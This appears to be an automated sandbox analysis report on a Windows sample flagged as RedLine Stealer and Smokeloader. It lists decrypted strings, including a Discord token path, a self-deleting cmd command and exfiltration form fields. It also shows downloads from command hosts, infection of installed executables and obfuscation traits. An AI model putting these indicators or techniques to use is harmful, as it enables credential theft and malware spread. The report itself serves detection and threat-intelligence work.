                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: soft
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: \Discord\tokens.txt
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: /c timeout /t 5 & del /f /q "
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: " & del "C:\ProgramData\*.dll"" & exit
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: C:\Windows\system32\cmd.exe
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: https
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: Content-Type: multipart/form-data; boundary=----
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: POST
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: HTTP/1.1
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: Content-Disposition: form-data; name="
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: hwid
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: build
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: token
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: file_name
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: file
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: message
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: screenshot.jpg
                  Source: C:\Users\user\Desktop\7Y18r(193).exeCode function: 0_2_00408670 memset,lstrlen,CryptStringToBinaryA,memcpy,lstrcat,lstrcat,lstrcat,0_2_00408670
                  Source: C:\Users\user\Desktop\7Y18r(193).exeCode function: 0_2_004061B0 CryptStringToBinaryA,CryptStringToBinaryA,0_2_004061B0
                  Source: C:\Users\user\Desktop\7Y18r(193).exeCode function: 0_2_008988D7 memset,lstrlen,CryptStringToBinaryA,memcpy,lstrcat,lstrcat,lstrcat,0_2_008988D7
                  Source: C:\Users\user\Desktop\7Y18r(193).exeCode function: 0_2_00896417 CryptStringToBinaryA,CryptStringToBinaryA,0_2_00896417

Compliance

Source: C:\Users\user\Desktop\7Y18r(193).exe | Unpacked PE file: 0.2.7Y18r(193).exe.400000.0.unpack
Source: 7Y18r(193).exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\7Y18r(193).exe | File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.2.dr

Spreading

Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exe | System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe
Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exe | System file written: C:\Program Files\7-Zip\Uninstall.exe
Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exe | System file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe
Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exe | Code function: 2_2_007029E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose | 2_2_007029E2
Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exe | Code function: 2_2_00702B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread | 2_2_00702B8C
Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exe | File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\
Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exe | File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\
Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exe | File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\
Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exe | File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\
Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exe | File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\
Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exe | File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\

Networking

Source: Malware configuration extractor | URLs: http://bernardofata.icu/40d570f44e84a454.php
Source: unknown | Network traffic detected: HTTP traffic on port 49705 -> 799
Source: global traffic | TCP traffic: 192.168.2.8:49705 -> 44.221.84.105:799
Source: Joe Sandbox View | IP Address: 44.221.84.105 44.221.84.105
Source: global traffic | HTTP traffic detected: GET /cj//k1.rar HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: ddos.dnsnb8.net:799
  Connection: Keep-Alive
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exe | Code function: 2_2_00701099 wsprintfA,WinExec,lstrlen,wsprintfA,wsprintfA,URLDownloadToFileA,lstrlen,Sleep | 2_2_00701099
Source: global traffic | HTTP traffic detected: GET /cj//k1.rar HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: ddos.dnsnb8.net:799
  Connection: Keep-Alive
Source: global traffic | DNS traffic detected: DNS query: ddos.dnsnb8.net
Source: WuiXLS.exe, 00000002.00000003.1394029719.00000000001F0000.00000004.00001000.00020000.00000000.sdmp, WuiXLS.exe, 00000002.00000002.1505812260.0000000000703000.00000002.00000001.01000000.00000004.sdmp | String found in binary or memory: http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE
Source: WuiXLS.exe, 00000002.00000002.1505404095.0000000000611000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ddos.dnsnb8.net/
Source: WuiXLS.exe, 00000002.00000002.1505943668.000000000231A000.00000004.00000010.00020000.00000000.sdmp, WuiXLS.exe, 00000002.00000002.1505404095.000000000059E000.00000004.00000020.00020000.00000000.sdmp, WuiXLS.exe, 00000002.00000002.1505404095.00000000005E2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar
Source: WuiXLS.exe, 00000002.00000002.1505404095.000000000059E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarH
Source: WuiXLS.exe, 00000002.00000002.1505404095.00000000005E2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarn.=
Source: WuiXLS.exe, 00000002.00000002.1505943668.000000000231A000.00000004.00000010.00020000.00000000.sdmp | String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarp
Source: WuiXLS.exe, 00000002.00000002.1505943668.000000000231A000.00000004.00000010.00020000.00000000.sdmp | String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarq
Source: Amcache.hve.6.dr | String found in binary or memory: http://upx.sf.net
Source: SciTE.exe.2.dr | String found in binary or memory: http://www.activestate.com
Source: SciTE.exe.2.dr | String found in binary or memory: http://www.activestate.comHolger
Source: SciTE.exe.2.dr | String found in binary or memory: http://www.baanboard.com
Source: SciTE.exe.2.dr | String found in binary or memory: http://www.baanboard.comBrendon
Source: SciTE.exe.2.dr | String found in binary or memory: http://www.develop.com
Source: SciTE.exe.2.dr | String found in binary or memory: http://www.develop.comDeepak
Source: SciTE.exe.2.dr | String found in binary or memory: http://www.lua.org
Source: SciTE.exe.2.dr | String found in binary or memory: http://www.rftp.com
Source: SciTE.exe.2.dr | String found in binary or memory: http://www.rftp.comJosiah
Source: SciTE.exe.2.dr | String found in binary or memory: http://www.scintilla.org
Source: SciTE.exe.2.dr | String found in binary or memory: http://www.scintilla.org/scite.rng
Source: SciTE.exe.2.dr | String found in binary or memory: http://www.spaceblue.com
Source: SciTE.exe.2.dr | String found in binary or memory: http://www.spaceblue.comMathias
Source: WuiXLS.exe, 00000002.00000002.1505404095.0000000000611000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com
Source: SciTE.exe.2.dr | String found in binary or memory: https://www.smartsharesystems.com/
Source: SciTE.exe.2.dr | String found in binary or memory: https://www.smartsharesystems.com/Morten
Source: SciTE.exe.2.dr | Binary or memory string: _winapi_getrawinputdata _winapi_getrawinputdeviceinfo _winapi_getregiondata _winapi_getregisteredrawinputdevices \memstr_28c6fd72-a

System Summary

Source: 0.2.7Y18r(193).exe.890e67.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.1511542856.0000000000890000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.1511687586.00000000008E2000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: MyProg.exe.2.dr | Static PE information: section name: Y|uR
Source: WuiXLS.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: C:\Users\user\Desktop\7Y18r(193).exe | Code function: 0_2_008A8029 | 0_2_008A8029
Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exe | Code function: 2_2_00706076 | 2_2_00706076
Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exe | Code function: 2_2_00706D00 | 2_2_00706D00
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\WuiXLS.exe 4485DF22C627FA0BB899D79AA6FF29BC5BE1DBC3CAA2B7A490809338D54B7794
Source: C:\Users\user\Desktop\7Y18r(193).exe | Code function: String function: 00403810 appears 343 times
Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7496 -s 1488
Source: MyProg.exe.2.dr | Static PE information: Resource name: RT_VERSION type: MIPSEB-LE ECOFF executable not stripped - version 0.79
Source: 7Y18r(193).exe, 00000000.00000002.1511315758.00000000007B7000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameBuskobasek.exe: vs 7Y18r(193).exe
Source: 7Y18r(193).exe | Binary or memory string: OriginalFilenameBuskobasek.exe: vs 7Y18r(193).exe
Source: 7Y18r(193).exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 0.2.7Y18r(193).exe.890e67.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.1511542856.0000000000890000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.1511687586.00000000008E2000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: WuiXLS.exe.0.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: WuiXLS.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: WuiXLS.exe.0.dr | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
Source: classification engine | Classification label: mal100.spre.troj.evad.winEXE@5/13@4/1
Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exe | Code function: 2_2_0070119F GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,CloseHandle | 2_2_0070119F
Source: C:\Users\user\Desktop\7Y18r(193).exe | Code function: 0_2_008E5D77 CreateToolhelp32Snapshot,Module32First | 0_2_008E5D77
Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7472
Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7496
Source: C:\Users\user\Desktop\7Y18r(193).exe | File created: C:\Users\user\AppData\Local\Temp\WuiXLS.exe
Source: C:\Users\user\Desktop\7Y18r(193).exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: 7Y18r(193).exe | ReversingLabs: Detection: 95%
Source: 7Y18r(193).exe | Virustotal: Detection: 93%
Source: unknown | Process created: C:\Users\user\Desktop\7Y18r(193).exe "C:\Users\user\Desktop\7Y18r(193).exe"
Source: C:\Users\user\Desktop\7Y18r(193).exe | Process created: C:\Users\user\AppData\Local\Temp\WuiXLS.exe C:\Users\user\AppData\Local\Temp\WuiXLS.exe
Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7496 -s 1488
Source: C:\Users\user\Desktop\7Y18r(193).exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7472 -s 528
Source: C:\Users\user\Desktop\7Y18r(193).exe | Process created: C:\Users\user\AppData\Local\Temp\WuiXLS.exe C:\Users\user\AppData\Local\Temp\WuiXLS.exe
Source: C:\Users\user\Desktop\7Y18r(193).exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\7Y18r(193).exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\7Y18r(193).exe | Section loaded: msimg32.dll
Source: C:\Users\user\Desktop\7Y18r(193).exe | Section loaded: msvcr100.dll
Source: C:\Users\user\Desktop\7Y18r(193).exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exe | Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exe | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exe | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exe | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exe | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exe | Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exe | Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exe | Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
Source: C:\Users\user\Desktop\7Y18r(193).exe | File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.2.dr

Data Obfuscation

Source: C:\Users\user\Desktop\7Y18r(193).exe | Unpacked PE file: 0.2.7Y18r(193).exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;Iu9:EW; vs .text:EW;.rdata:R;.data:W;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exe | Unpacked PE file: 2.2.WuiXLS.exe.700000.1.unpack .text:EW;.rdata:W;.data:W;.reloc:W;.aspack:EW;.adata:EW; vs .text:ER;.rdata:R;.data:W;.reloc:R;.aspack:EW;.adata:EW;
Source: C:\Users\user\Desktop\7Y18r(193).exe | Unpacked PE file: 0.2.7Y18r(193).exe.400000.0.unpack
Source: C:\Users\user\Desktop\7Y18r(193).exe | Code function: 0_2_00412180 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress | 0_2_00412180
Source: initial sample | Static PE information: section where entry point is pointing to: Iu9
Source: 7Y18r(193).exe | Static PE information: section name: Iu9
Source: WuiXLS.exe.0.dr | Static PE information: section name: .aspack
Source: WuiXLS.exe.0.dr | Static PE information: section name: .adata
Source: Uninstall.exe.2.dr | Static PE information: section name: EpNuZ
Source: MyProg.exe.2.dr | Static PE information: section name: PELIB
Source: MyProg.exe.2.dr | Static PE information: section name: Y|uR
Source: SciTE.exe.2.dr | Static PE information: section name: u
Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exe | Code function: 2_2_00701638 push dword ptr [00703084h]; ret | 2_2_0070170E
Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exe | Code function: 2_2_00706014 push 007014E1h; ret | 2_2_00706425
Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exe | Code function: 2_2_00702D9B push ecx; ret | 2_2_00702DAB
Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exe | Code function: 2_2_0070600A push ebp; ret | 2_2_0070600D
Source: 7Y18r(193).exe | Static PE information: section name: Iu9 entropy: 6.934398937344117
Source: WuiXLS.exe.0.dr | Static PE information: section name: .text entropy: 7.81169422100848
Source: Uninstall.exe.2.dr | Static PE information: section name: EpNuZ entropy: 6.933404246102348
Source: MyProg.exe.2.dr | Static PE information: section name: Y|uR entropy: 6.934452551344648
Source: SciTE.exe.2.dr | Static PE information: section name: u entropy: 6.934015882933062

                  Persistence and Installation Behavior

                  Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exe | System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe
                  Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exe | System file written: C:\Program Files\7-Zip\Uninstall.exe
                  Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exe | System file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe
                  Source: C:\Users\user\Desktop\7Y18r(193).exe | File created: C:\Users\user\AppData\Local\Temp\WuiXLS.exe
                  Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exe | File created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe
                  Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exe | File created: C:\Program Files\7-Zip\Uninstall.exe
                  Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exe | File created: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe

                  Hooking and other Techniques for Hiding and Protection

                  Source: unknown | Network traffic detected: HTTP traffic on port 49705 -> 799
                  Source: C:\Users\user\Desktop\7Y18r(193).exe | Code function: 0_2_00412180 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, | 0_2_00412180
                  Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
